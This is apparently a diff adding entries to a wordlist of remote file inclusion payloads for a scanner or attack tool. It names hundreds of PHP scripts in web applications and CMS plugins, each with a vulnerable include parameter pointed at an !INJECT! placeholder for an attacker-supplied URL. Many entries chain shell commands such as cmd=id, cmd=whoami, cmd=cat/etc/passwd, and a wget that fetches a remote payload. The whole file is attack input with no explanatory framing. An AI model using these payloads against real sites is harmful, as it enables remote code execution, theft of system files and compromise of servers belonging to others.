+/components/com_minibb.php?absolute_path=!INJECT!
+/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=!INJECT!
+/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=!INJECT!
+/components/com_mospray/scripts/admin.php?basedir=!INJECT!?&cmd=id
+/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=!INJECT!
+/components/com_mp3_allopass/allopass.php?mosConfig_live_site=!INJECT!
+/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
+/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=!INJECT!?
+/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=!INJECT!
+/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
+/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=!INJECT!
+/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
+/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
+/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=!INJECT!?
+/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=!INJECT!
+/components/com_smf/smf.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=!INJECT!
+/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=!INJECT!
+/components/core/connect.php?language_path=!INJECT!
+/components/minibb/bb_plugins.php?absolute_path=!INJECT!?
+/components/minibb/index.php?absolute_path=!INJECT!?
+/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
+/compteur/mapage.php?chemin=!INJECT!
+/conf.php?securelib=!INJECT!
+/conf.php?securelib=!INJECT!?
+/config.inc.php3?rel_path=!INJECT!
+/config.inc.php?_path=!INJECT!
+/config.inc.php?path_escape=!INJECT!
+/config.inc.php?path_escape=!INJECT!%00
+/config.php?full_path=!INJECT!?
+/config.php?full_path_to_db=!INJECT!
+/config.php?fullpath=!INJECT!
+/config.php?incpath=!INJECT!
+/config.php?path_to_root=!INJECT!
+/config.php?rel_path=!INJECT!?
+/config.php?returnpath=!INJECT!
+/config.php?sql_language=!INJECT!?
+/config.php?xcart_dir=!INJECT!?
+/config/config_admin.php?INC=!INJECT!?
+/config/config_main.php?INC=!INJECT!?
+/config/config_member.php?INC=!INJECT!?
+/config/dbutil.bck.php?confdir=!INJECT!
+/config/mysql_config.php?INC=!INJECT!?
+/config/sender.php?ROOT_PATH=!INJECT!?
+/configuration.php?absolute_path=!INJECT!?
+/confirmUnsubscription.php?output=!INJECT!
+/connect.php?path=!INJECT!
+/connexion.php?DOCUMENT_ROOT=!INJECT!?
+/contact.php?blog_theme=!INJECT!
+/contacts.php?cal_dir=!INJECT!
+/contenido/external/frontend/news.php?cfg[path][includes]=!INJECT!
+/content.php?content=!INJECT!
+/content/admin.php?pwfile=!INJECT!
+/content/content.php?fileloc=!INJECT!?
+/content/delete.php?pwfile=!INJECT!
+/content/modify.php?pwfile=!INJECT!
+/content/modify_go.php?pwfile=!INJECT!
+/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=!INJECT!
+/contrib/mx_glance_sdesc.php?mx_root_path=!INJECT!
+/contrib/phpBB2/modules.php?phpbb_root_path=!INJECT!?
+/controllers/MySQLController.php?baseDir=!INJECT!
+/controllers/SQLController.php?baseDir=!INJECT!
+/controllers/SetupController.php?baseDir=!INJECT!
+/controllers/VideoController.php?baseDir=!INJECT!
+/controllers/ViewController.php?baseDir=!INJECT!
+/convert-date.php?cal_dir=!INJECT!
+/convert/mvcw.php?step=1&vwar_root=!INJECT!
+/convert/mvcw.php?vwar_root=!INJECT!
+/core/admin/admin.php?p=admin&absoluteurl!INJECT!
+/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl!INJECT!
+/core/admin/categories_add.php?absoluteurl!INJECT!
+/core/admin/categories_remove.php?absoluteurl!INJECT!
+/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl!INJECT!
+/core/admin/editdel.php?p=admin&absoluteurl!INJECT!
+/core/admin/ftpfeature.php?p=admin&absoluteurl!INJECT!
+/core/admin/login.php?absoluteurl!INJECT!
+/core/admin/pgRSSnews.php?absoluteurl!INJECT!
+/core/admin/showcat.php?absoluteurl!INJECT!
+/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl!INJECT!
+/core/archive_cat.php?absoluteurl!INJECT!
+/core/archive_nocat.php?absoluteurl!INJECT!
+/core/aural.php?site_absolute_path=!INJECT!
+/core/aural.php?site_absolute_path=!INJECT!?&cmd=dir
+/core/editor.php?editor_insert_bottom=!INJECT!
+/core/includes.php?CMS_ROOT=!INJECT!?
+/core/recent_list.php?absoluteurl!INJECT!
+/corpo.php?pagina=!INJECT!
+/cp2.php?securelib=!INJECT!?
+/cpe/index.php?repertoire_config=!INJECT!
+/crea.php?plancia=!INJECT!
+/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=!INJECT!?
+/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=!INJECT!?
+/creat_news_all.php?language=!INJECT!
+/create_file.php?target=!INJECT!?
+/cron.php?ROOT_PATH=!INJECT!
+/cron.php?include_path=!INJECT!?
+/crontab/run_billing.php?config[include_dir]=!INJECT!?
+/cross.php?url=!INJECT!
+/custom_vars.php?sys[path_addon]=!INJECT!
+/customer/product.php?xcart_dir=!INJECT!
+/cwb/comanda.php?INCLUDE_PATH=!INJECT!?
+/datei.php?config[root_ordner]=!INJECT!?&cmd=id
+/db/PollDB.php?CONFIG_DATAREADERWRITER=!INJECT!?
+/db/mysql/db.inc.php?SPL_CFG[dirroot]=!INJECT!?
+/dbcommon/include.php?_APP_RELATIVE_PATH=!INJECT!
+/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=!INJECT!
+/debugger.php?config_atkroot=!INJECT!
+/decoder/gallery.php?ccms_library_path=!INJECT!
+/decoder/markdown.php?ccms_library_path=!INJECT!
+/defaults_setup.php?ROOT_PATH=!INJECT!?cmd=ls
+/defines.php?WEBCHATPATH=!INJECT!?
+/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=!INJECT!&
+/depouilg.php3?NomVote=!INJECT!?
+/development.php?root_prefix=!INJECT!?
+/dfcode.php?DFORUM_PATH=!INJECT!?
+/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=!INJECT!?
+/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=!INJECT!?
+/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!
+/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!?
+/dialog.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/dialogs/a.php?spaw_dir=!INJECT!?&cmd=id
+/dialogs/collorpicker.php?spaw_dir=!INJECT!&cmd=id
+/dialogs/img.php?spaw_dir=!INJECT!?&cmd=id
+/dialogs/img_library.php?spaw_dir=!INJECT!?&cmd=id
+/dialogs/table.php?spaw_dir=!INJECT!?&cmd=id
+/dialogs/td.php?spaw_dir=!INJECT!?&cmd=id
+/digitaleye_Path/module.php?menu=!INJECT!?
+/dir/prepend.php?_PX_config[manager_path]=!INJECT!
+/dir_thatware/config.php?root_path=!INJECT!'
+/direct.php?rf=!INJECT!
+/direction/index.php?repertoire_config=!INJECT!
+/directory/index.php?path=!INJECT!
+/display.php?pag=!INJECT!
+/display.php?path=!INJECT!
+/displayCategory.php?basepath=!INJECT!
+/dix.php3?url_phpartenaire=!INJECT!
+/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
+/doc/admin/index.php?ptinclude=!INJECT!
+/doceboCore/lib/lib.php?GLOBALS[where_framework]=!INJECT!
+/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=!INJECT!
+/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=!INJECT!
+/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=!INJECT!
+/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=!INJECT!
+/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=!INJECT!
+/docs/front-end-demo/cart2.php?workdir=!INJECT!?
+/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=!INJECT!?&cmd=wget%20!INJECT!
+/dosearch.php?RESPATH=!INJECT!
+/download.php?root_prefix=!INJECT!?
+/download_engine_V1.4.3/addmember.php?eng_dir=!INJECT!
+/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=!INJECT!
+/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=!INJECT!
+/downstat1.8/chart.php?art=!INJECT!?
+/dp_logs.php?HomeDir=!INJECT!
+/eXPerience2/modules.php?file=!INJECT!
+/ea-gBook/index_inc.php?inc_ordner=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
+/edit.php?javascript_path=!INJECT!?
+/editor.php?newsfile=!INJECT!
+/editprofile.php?pathtohomedir=!INJECT!?
+/editsite.php?returnpath=!INJECT!
+/editx/add_address.php?include_dir=!INJECT!
+/elseif/contenus.php?contenus=!INJECT!
+/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=!INJECT!
+/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=!INJECT!
+/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=!INJECT!
+/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=!INJECT!
+/elseif/moduleajouter/depot/usrdepot.php?corpsdesign!INJECT!
+/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=!INJECT!
+/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=!INJECT!
+/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=!INJECT!
+/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=!INJECT!
+/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=!INJECT!
+/email_subscribe.php?root_prefix=!INJECT!?
+/embed/day.php?path=!INJECT!
+/enc/content.php?Home_Path=!INJECT!?
+/engine/Ajax/editnews.php?root_dir=!INJECT!
+/engine/api/api.class.php?dle_config_api=!INJECT!?
+/engine/engine.inc.php?absolute_path=!INJECT!
+/engine/init.php?root_dir=!INJECT!
+/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=!INJECT!?
+/enth3/show_joined.php?path=!INJECT!
+/environment.php?DIR_PREFIX=!INJECT!
+/epal/index.php?view=!INJECT!?
+/errors.php?error=!INJECT!
+/errors/configmode.php?GALLERY_BASEDIR=!INJECT!
+/errors/needinit.php?GALLERY_BASEDIR=!INJECT!
+/errors/reconfigure.php?GALLERY_BASEDIR=!INJECT!
+/errors/unconfigured.php?GALLERY_BASEDIR=!INJECT!
+/es_custom_menu.php?files_dir=!INJECT!
+/es_desp.php?files_dir=!INJECT!
+/es_offer.php?files_dir=!INJECT!
+/eshow.php?Config_rootdir=!INJECT!
+/esupport/admin/autoclose.php?subd=!INJECT!?
+/eva/index.php3?aide=!INJECT!?
+/eva/index.php3?perso=!INJECT!
+/eva/index.php?eva[caminho]=!INJECT!
+/event.php?myevent_path=!INJECT!
+/event_cal/module/embed/day.php?path=!INJECT!
+/eventcal2.php.php?path_simpnews=!INJECT!
+/eventscroller.php?path_simpnews=!INJECT!
+/example-view/templates/article.php?globals[content_dir]=!INJECT!?
+/example-view/templates/dates_list.php?globals[content_dir]=!INJECT!?
+/example-view/templates/root.php?globals[content_dir]=!INJECT!?
+/example.php?site=!INJECT!
+/example/gamedemo/inc.functions.php?projectPath=!INJECT!?
+/examplefile.php?bibtexrootrel=!INJECT!?
+/examples/patExampleGen/bbcodeSource.php?example=!INJECT!
+/exception/include.php?_APP_RELATIVE_PATH=!INJECT!
+/extauth/drivers/ldap.inc.php?clarolineRepositorySys=!INJECT!
+/extras/mt.php?web_root=!INJECT!
+/extras/poll/poll.php?file_newsportal=!INJECT!
+/ezusermanager_pwd_forgott.php?ezUserManager_Path=!INJECT!
+/faq.php?module_root_path=!INJECT!
+/faq.php?phpbb_root_path=!INJECT!
+/fckeditor/editor/dialog/fck_link.php?dirroot=!INJECT!
+/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=!INJECT!
+/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=!INJECT!?&cmd=id
+/fcring.php?s_fuss=!INJECT!
+/feed.php?config[root_ordner]=!INJECT!?&cmd=id
+/feed/index2.php?m=!INJECT!
+/files/amazon-bestsellers.php?CarpPath=!INJECT!
+/files/carprss.php?CarpPath=!INJECT!
+/files/compose-attach.php3?BSX_LIBDIR=!INJECT!
+/files/compose-menu.php3?BSX_LIBDIR=!INJECT!
+/files/compose-new.php3?BSX_LIBDIR=!INJECT!
+/files/compose-send.php3?BSX_LIBDIR=!INJECT!
+/files/folder-create.php3?BSX_LIBDIR=!INJECT!
+/files/folder-delete.php3?BSX_LIBDIR=!INJECT!
+/files/folder-empty.php3?BSX_LIBDIR=!INJECT!
+/files/folder-rename.php3?BSX_LIBDIR=!INJECT!
+/files/folders.php3?BSX_LIBDIR=!INJECT!
+/files/login.php3?err=hack&BSX_HTXDIR=!INJECT!
+/files/mainfile.php?page[path]=!INJECT!?&cmd=ls
+/files/mbox-list.php3?BSX_LIBDIR=!INJECT!
+/files/message-delete.php3?BSX_LIBDIR=!INJECT!
+/files/message-forward.php3?BSX_LIBDIR=!INJECT!
+/files/message-header.php3?BSX_LIBDIR=!INJECT!
+/files/message-print.php3?BSX_LIBDIR=!INJECT!
+/files/message-read.php3?BSX_LIBDIR=!INJECT!
+/files/message-reply.php3?BSX_LIBDIR=!INJECT!
+/files/message-replyall.php3?BSX_LIBDIR=!INJECT!
+/files/message-search.php3?BSX_LIBDIR=!INJECT!
+/findix/index.php?page=!INJECT!?&cmd=id
+/fishcart_v3/fc_functions/fc_example.php?docroot=!INJECT!
+/flushcmd/Include/editor/rich_files/class.rich.php?class_path=!INJECT!?
+/fonctions/template.php?repphp=!INJECT!?
+/fonctions_racine.php?chemin_lib=!INJECT!
+/footer.inc.php?settings[footer]=!INJECT!
+/footer.inc.php?tfooter=!INJECT!?
+/footer.php?footer_file=!INJECT!
+/footer.php?op[footer_body]=!INJECT!?
+/form.php?path=!INJECT!?&cmd=pwd
+/forum.php?cfg_file=1&fpath=!INJECT!?
+/forum/forum.php?view=!INJECT!
+/forum/forum82lib.php3?repertorylevel=!INJECT!?
+/forum/gesfil.php?repertorylevel=!INJECT!?
+/forum/lostpassword.php?repertorylevel=!INJECT!?
+/forum/mail.php?repertorylevel=!INJECT!?
+/forum/member.php?repertorylevel=!INJECT!?
+/forum/message.php?repertorylevel=!INJECT!?
+/forum/search.php?repertorylevel=!INJECT!?
+/forum/track.php?path=!INJECT!
+/frame.php?framefile=!INJECT!
+/ftp.php?path_local=!INJECT!
+/function.inc.php?path=!INJECT!
+/function.php?adminfolder=!INJECT!
+/function.php?gbpfad=!INJECT!
+/functions.php?include_path=!INJECT!
+/functions.php?pmp_rel_path=!INJECT!
+/functions.php?s[phppath]=!INJECT!
+/functions.php?set_path=!INJECT!?
+/functions/form.func.php?GLOBALS[PTH][classes]=!INJECT!?
+/functions/general.func.php?GLOBALS[PTH][classes]=!INJECT!?
+/functions/groups.func.php?GLOBALS[PTH][classes]=!INJECT!?
+/functions/js.func.php?GLOBALS[PTH][classes]=!INJECT!?
+/functions/prepend_adm.php?SETS[path][physical]=!INJECT!
+/functions/prepend_adm.php?SETS[path][physical]=!INJECT!?
+/functions/sections.func.php?GLOBALS[PTH][classes]=!INJECT!?
+/functions/users.func.php?GLOBALS[PTH][classes]=!INJECT!?
+/functions_mod_user.php?phpbb_root_path=!INJECT!?&cmd=ls
+/fusebox5.php?FUSEBOX_APPLICATION_PATH=!INJECT!
+/galerie.php?config[root_ordner]=!INJECT!?cmd=id
+/gallery/captionator.php?GALLERY_BASEDIR=!INJECT!
+/gallery/lib/content.php?include=!INJECT!?cmd=ls
+/gallery/theme/include_mode/template.php?galleryfilesdir=!INJECT!
+/gallerypath/index.php?includepath=!INJECT!
+/games.php?id=!INJECT!
+/games.php?scoreid=!INJECT!
+/gbook/includes/header.php?abspath=!INJECT!?
+/gemini/page/forums/bottom.php?lang=!INJECT!?
+/gen_m3u.php?phpbb_root_path=!INJECT!
+/genepi.php?topdir=!INJECT!
+/generate.php?ht_pfad=!INJECT!?
+/gepi/gestion/savebackup.php?filename=!INJECT!&cmd=cat/etc/passwd
+/gestArt/aide.php3?aide=!INJECT!?
+/get_session_vars.php?path_to_smf=!INJECT!
+/getpage.php?page=online&doc_path=!INJECT!
+/global.php?abs_path=!INJECT!?
+/gorum/dbproperty.php?appDirName=!INJECT!
+/gpb/include/db.mysql.inc.php?root_path=!INJECT!?
+/gpb/include/gpb.inc.php?root_path=!INJECT!?
+/graph.php?DOCUMENT_ROOT=!INJECT!?
+/gruppen.php?config[root_ordner]=!INJECT!?&cmd=id
+/handlers/email/mod.listmail.php?_PM_[path][handle]=!INJECT!
+/handlers/page/show.php?sous_rep=!INJECT!
+/head.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/header.inc.php?CssFile=!INJECT!
+/header.php?path=!INJECT!
+/header.php?wwwRoot=!INJECT!
+/help.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/help/index.php?show=!INJECT!
+/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
+/helperfunction.php?includedir=!INJECT!
+/hioxBannerRotate.php?hm=!INJECT!
+/hioxRandomAd.php?hm=!INJECT!
+/hioxstats.php?hm=!INJECT!
+/hioxupdate.php?hm=!INJECT!
+/home.php?a=!INJECT!
+/home.php?page=!INJECT!
+/home.php?pagina=!INJECT!
+/home/www/images/doc/index2.php?type=!INJECT!
+/home1.php?ln=!INJECT!
+/home2.php?ln=!INJECT!
+/hsList.php?subdir=!INJECT!?&cmd=ls
+/htdocs/gmapfactory/params.php?gszAppPath=!INJECT!
+/html/admin/modules/plugin_admin.php?_settings[pluginpath]=!INJECT!
+/hu/modules/reg-new/modstart.php?mod_dir=!INJECT!?
+/i_head.php?home=!INJECT!
+/i_nav.php?home=!INJECT!
+/iframe.php?file=!INJECT!
+/image.php?url=!INJECT!???
+/impex/ImpExData.php?systempath=!INJECT!
+/import.php?bibtexrootrel=!INJECT!?
+/importinfo.php?bibtexrootrel=!INJECT!?
+/in.php?returnpath=!INJECT!
+/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=!INJECT!
+/inc/config.inc.php?x[1]=!INJECT!
+/inc/design.inc.php?dir[data]=!INJECT!
+/inc/download_center_lite.inc.php?script_root=!INJECT!
+/inc/formmail.inc.php?script_root=!INJECT!
+/inc/gabarits.php?cfg_racine=!INJECT!
+/inc/header.inc.php?ficStyle=!INJECT!
+/inc/ifunctions.php?GLOBALS[phpQRootDir]=!INJECT!
+/inc/inc.php?cfg_racine=!INJECT!?
+/inc/indexhead.php?fileloc=!INJECT!?
+/inc/irayofuncs.php?irayodirhack=!INJECT!?
+/inc/libs/Smarty_Compiler.class.php?plugin_file=!INJECT!?
+/inc/libs/core/core.display_debug_console.php?plugin_file=!INJECT!?
+/inc/libs/core/core.load_plugins.php?plugin_file=!INJECT!?
+/inc/libs/core/core.load_resource_plugin.php?plugin_file=!INJECT!?
+/inc/libs/core/core.process_cached_inserts.php?plugin_file=!INJECT!?
+/inc/libs/core/core.process_compiled_include.php?plugin_file=!INJECT!?
+/inc/libs/core/core.read_cache_file.php?plugin_file=!INJECT!?
+/inc/linkbar.php?cfile=!INJECT!?
+/inc/login.php?pathCGX=!INJECT!
+/inc/logingecon.php?pathCGX=!INJECT!
+/inc/ltdialogo.php?pathCGX=!INJECT!
+/inc/mtdialogo.php?pathCGX=!INJECT!
+/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=!INJECT!?
+/inc/prepend.inc.php?path=!INJECT!?
+/inc/service.alert.inc.php?SPL_CFG[dirroot]=!INJECT!?
+/inc/settings.php?inc_dir=!INJECT!
+/inc/settings.ses.php?SPL_CFG[dirroot]=!INJECT!?
+/inc/shows.inc.php?cutepath=!INJECT!?
+/inc/sige_init.php?SYS_PATH=!INJECT!?
+/inc_group.php?include_path=!INJECT!?
+/inc_manager.php?include_path=!INJECT!?
+/inc_newgroup.php.php?include_path=!INJECT!?
+/inc_smb_conf.php?include_path=!INJECT!?
+/inc_user.php?include_path=!INJECT!?
+/include.php?_APP_RELATIVE_PATH=!INJECT!
+/include.php?gorumDir=!INJECT!
+/include.php?myng_root=!INJECT!
+/include.php?path=psp/user.php&site=!INJECT!
+/include.php?path[docroot]=!INJECT!
+/include.php?sunPath=!INJECT!
+/include/Beautifier/Core.php?BEAUT_PATH=!INJECT!
+/include/HTML_oben.php?include_path=!INJECT!
+/include/HTML_oben.php?include_path=!INJECT!?
+/include/SQuery/gameSpy2.php?libpath=!INJECT!
+/include/bbs.lib.inc.php?site_path=!INJECT!
+/include/class_yapbbcooker.php?cfgIncludeDirectory=!INJECT!
+/include/classes.php?INCLUDE_DIR=!INJECT!?
+/include/client.php?INCLUDE_DIR=!INJECT!?
+/include/cls_headline_prod.php?INCLUDE_PATH=!INJECT!
+/include/cls_listorders.php?INCLUDE_PATH=!INJECT!
+/include/cls_viewpastorders.php?INCLUDE_PATH=!INJECT!
+/include/common.php?XOOPS_ROOT_PATH=!INJECT!
+/include/common_functions.php?baros_path=!INJECT!?
+/include/config.inc.php?racine=!INJECT!
+/include/copyright.php?tsep_config[absPath]=!INJECT!?cmd=ls
+/include/customize.php?l=!INJECT!&text=Hello%20World
+/include/default_header.php?script_path=!INJECT!
+/include/define.php?INC_DIR=!INJECT!?
+/include/disp_form.php3?cfg_include_dir=!INJECT!?
+/include/disp_smileys.php3?cfg_include_dir=!INJECT!?
+/include/dom.php?path=!INJECT!
+/include/dtd.php?path=!INJECT!
+/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=!INJECT!?
+/include/engine/content/elements/menu.php?CONFIG[AdminPath]=!INJECT!
+/include/forms.php?INCLUDE_DIR=!INJECT!?
+/include/global.php?pfad=!INJECT!
+/include/header.php?cs_base_path=!INJECT!?
+/include/html/nettools.popup.php?DIR=!INJECT!
+/include/inc.foot.php?root=!INJECT!
+/include/inc_ext/spaw/dialogs/table.php?spaw_root=!INJECT!
+/include/inc_freigabe.php?include_path=!INJECT!?
+/include/inc_freigabe1.php?include_path=!INJECT!?
+/include/inc_freigabe3.php?include_path=!INJECT!?
+/include/include_stream.inc.php?include_path=!INJECT!
+/include/include_top.php?g_include=!INJECT!
+/include/includes.php?include_path=!INJECT!
+/include/index.php3?cfg_include_dir=!INJECT!?
+/include/init.inc.php?G_PATH=!INJECT!
+/include/issue_edit.php?INCLUDE_DIR=!INJECT!?
+/include/lib/lib_slots.php?main_path=!INJECT!
+/include/lib/lib_stats.php?main_path=!INJECT!?
+/include/lib/lib_users.php?main_path=!INJECT!?
+/include/little_news.php3?cfg_include_dir=!INJECT!?
+/include/livre_include.php?no_connect=lol&chem_absolu=!INJECT!?
+/include/loading.php?path_include=!INJECT!
+/include/mail.inc.php?root=!INJECT!
+/include/menu_builder.php?config[page_dir]=!INJECT!?
+/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=!INJECT!
+/include/monitoring/engine/MakeXML.php?fileOreonConf=!INJECT!?
+/include/parser.php?path=!INJECT!
+/include/pear/IT.php?basepath=!INJECT!?
+/include/pear/ITX.php?basepath=!INJECT!?
+/include/pear/IT_Error.php?basepath=!INJECT!?
+/include/phpxd/phpXD.php?appconf[rootpath]=!INJECT!?&cmd=id
+/include/prodler.class.php?sPath=!INJECT!???
+/include/scripts/export_batch.inc.php?DIR=!INJECT!
+/include/scripts/run_auto_suspend.cron.php?DIR=!INJECT!
+/include/scripts/send_email_cache.php?DIR=!INJECT!
+/include/startup.inc.php?root_path=!INJECT!?
+/include/themes/themefunc.php?myNewsConf[path][sys][index]=!INJECT!?
+/include/timesheet.php?config[include_dir]=!INJECT!
+/include/urights.php?CRM_inc=!INJECT!
+/includes/admin_board2.php?phpbb_root_path=!INJECT!?ls
+/includes/admin_logger.php?phpbb_root_path=!INJECT!?ls
+/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=!INJECT!?
+/includes/ajax_listado.php?urlModulo=!INJECT!
+/includes/archive/archive_topic.php?phpbb_root_path=!INJECT!?
+/includes/bbcb_mg.php?phpbb_root_path=!INJECT!?
+/includes/begin.inc.php?PagePrefix=!INJECT!
+/includes/blogger.php?path_prefix=!INJECT!
+/includes/class/class_tpl.php?cache_file=!INJECT!?
+/includes/class_template.php?quezza_root_path=!INJECT!
+/includes/classes/pctemplate.php?pcConfig[smartyPath]=!INJECT!?cmd
+/includes/common.inc.php?CONFIG[BASE_PATH]=!INJECT!
+/includes/common.php?module_root_path=!INJECT!?
+/includes/common.php?root=!INJECT!?
+/includes/common.php?root_path=!INJECT!?
+/includes/config.inc.php?racineTBS=!INJECT!
+/includes/config/master.inc.php?fm_data[root]=!INJECT!?
+/includes/connection.inc.php?PagePrefix=!INJECT!
+/includes/dbal.php?eqdkp_root_path=!INJECT!
+/includes/events.inc.php?PagePrefix=!INJECT!
+/includes/footer.html.inc.php?tc_config[app_root]=!INJECT!?
+/includes/footer.inc.php?PagePrefix=!INJECT!
+/includes/footer.php?PHPGREETZ_INCLUDE_DIR=!INJECT!
+/includes/functions.inc.php?sitepath=!INJECT!?
+/includes/functions.php?location=!INJECT!
+/includes/functions.php?phpbb_root_path=!INJECT!
+/includes/functions.php?phpbb_root_path=!INJECT!?
+/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
+/includes/functions/html_generate.php?path_prefix=!INJECT!
+/includes/functions/master.inc.php?fm_data[root]=!INJECT!?
+/includes/functions/validations.php?path_prefix=!INJECT!
+/includes/functions_admin.php?phpbb_root_path=!INJECT!?
+/includes/functions_install.php?vwar_root=!INJECT!
+/includes/functions_kb.php?phpbb_root_path=!INJECT!?
+/includes/functions_mod_user.php?phpbb_root_path=!INJECT!?
+/includes/functions_portal.php?phpbb_root_path=!INJECT!?
+/includes/functions_user_viewed_posts.php?phpbb_root_path=!INJECT!?
+/includes/global.php?nbs=!INJECT!?
+/includes/header.inc.php?PagePrefix=!INJECT!
+/includes/header.inc.php?dateiPfad=!INJECT!
+/includes/include_once.php?include_file=!INJECT!
+/includes/init.php?includepath=!INJECT!?
+/includes/iplogger.php?phpbb_root_path=!INJECT!?ls
+/includes/kb_constants.php?module_root_path=!INJECT!
+/includes/lang/language.php?path_to_root=!INJECT!
+/includes/lib-account.inc.php?CONF_CONFIG_PATH=!INJECT!?
+/includes/lib-group.inc.php?CONF_CONFIG_PATH=!INJECT!?
+/includes/lib-log.inc.php?CONF_CONFIG_PATH=!INJECT!?
+/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=!INJECT!?
+/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=!INJECT!?
+/includes/lib-themes.inc.php?CONF_CONFIG_PATH=!INJECT!?
+/includes/logger_engine.php?phpbb_root_path=!INJECT!
+/includes/menuleft.inc.php?PagePrefix=!INJECT!
+/includes/mkb.php?phpbb_root_path=!INJECT!?ls
+/includes/morcegoCMS/adodb/adodb.inc.php?path=!INJECT!
+/includes/morcegoCMS/morcegoCMS.php?fichero=!INJECT!
+/includes/mx_common.php?module_root_path=!INJECT!?
+/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=!INJECT!
+/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=!INJECT!
+/includes/pafiledb_constants.php?module_root_path=!INJECT!
+/includes/pages.inc.php?PagePrefix=!INJECT!
+/includes/phpdig/includes/config.php?relative_script_path=!INJECT!
+/includes/profilcp_constants.php?module_root_path=!INJECT!?
+/includes/settings.inc.php?approot=!INJECT!
+/includes/template.php?myevent_path=!INJECT!
+/includes/themen_portal_mitte.php?phpbb_root_path=!INJECT!
+/includes/tumbnail.php?config[root_ordner]=!INJECT!?
+/includes/usercp_register.php?phpbb_root_path=!INJECT!?
+/includes/usercp_viewprofile.php?phpbb_root_path=!INJECT!?
+/includes/xhtml.php?d_root=!INJECT!?
+/index.php3?Application_Root=!INJECT!
+/index.php?1=lol&PAGES[lol]=!INJECT!
+/index.php?AML_opensite=!INJECT!
+/index.php?AMV_openconfig=1&AMV_serverpath=!INJECT!
+/index.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/index.php?ConfigDir=!INJECT!
+/index.php?DIR_PLUGINS=!INJECT!
+/index.php?G_JGALL[inc_path]=!INJECT!%00
+/index.php?HomeDir=!INJECT!
+/index.php?Lang=AR&Page=!INJECT!
+/index.php?Madoa=!INJECT!?
+/index.php?RP_PATH=!INJECT!
+/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
+/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
+/index.php?abg_path=!INJECT!?
+/index.php?abs_path=!INJECT!?
